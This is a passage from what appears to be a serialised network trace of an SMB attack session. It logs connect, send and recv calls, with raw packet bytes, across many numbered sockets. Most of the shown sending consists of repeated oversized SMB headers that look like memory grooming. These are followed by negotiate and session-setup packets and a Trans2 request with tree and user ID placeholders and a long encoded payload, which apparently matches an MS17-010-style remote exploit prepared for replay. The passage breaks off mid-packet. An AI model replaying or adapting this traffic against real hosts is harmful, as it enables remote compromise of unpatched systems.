b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('connect', 9, 0.0)\", \"('connect', 10, 0.0)\", \"('send', 9, b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 10, 
b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('connect', 11, 0.0)\", \"('connect', 12, 0.0)\", \"('send', 11, b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('connect', 13, 0.0)\", \"('send', 12, 
b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('connect', 14, 0.0)\", \"('send', 13, b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('connect', 15, 0.0)\", \"('send', 14, 
b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('connect', 16, 0.0)\", \"('send', 15, b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 16, 
b'\\\\x00\\\\x00\\\\x00\\\\x85\\\\xffSMBr\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18S\\\\xc8\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xff\\\\xfe\\\\x00\\\\x00@\\\\x00\\\\x00b\\\\x00\\\\x02PC NETWORK PROGRAM 1.0\\\\x00\\\\x02LANMAN1.0\\\\x00\\\\x02Windows for Workgroups 3.1a\\\\x00\\\\x02LM1.2X002\\\\x00\\\\x02LANMAN2.1\\\\x00\\\\x02NT LM 0.12\\\\x00', 0.0)\", \"('recv', 16, 0.0)\", \"('send', 16, b'\\\\x00\\\\x00\\\\x00Q\\\\xffSMBs\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07@\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xff\\\\xfe\\\\x00\\\\x00@\\\\x00\\\\x0c\\\\xff\\\\x00\\\\x00\\\\x00\\\\x04\\\\x11\\\\n\\\\x00,\\\\x01\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x80\\\\x16\\\\x00\\\\xf8\\\\x87\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('recv', 16, 0.0)\", \"('close', 2, 0.0)\", \"('connect', 17, 0.0)\", \"('send', 17, 
b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('connect', 18, 0.0)\", \"('connect', 19, 0.0)\", \"('send', 18, b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('connect', 20, 0.0)\", \"('send', 19, 
b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('connect', 21, 0.0)\", \"('send', 20, b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 21, 
b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('close', 16, 0.0)\", \"('send', 1, b'\\\\x00\\\\x00\\\\x001\\\\xffSMB+\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\xfe__USERID__PLACEHOLDER__@\\\\x00\\\\x01\\\\x01\\\\x00\\\\x0c\\\\x00JlJmIhClBsr\\\\x00', 0.0)\", \"('recv', 1, 0.0)\", \"('send', 1, 
b'\\\\x00\\\\x00\\\\x105\\\\xffSMB3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\xfe__USERID__PLACEHOLDER__@\\\\x00\\\\t\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x105\\\\x00\\\\xd0\\\\xf3\\\\x00\\\\x00\\\\x00\\\\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\\\\x80\\\\x00\\\\xa8\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xff\\\\xff\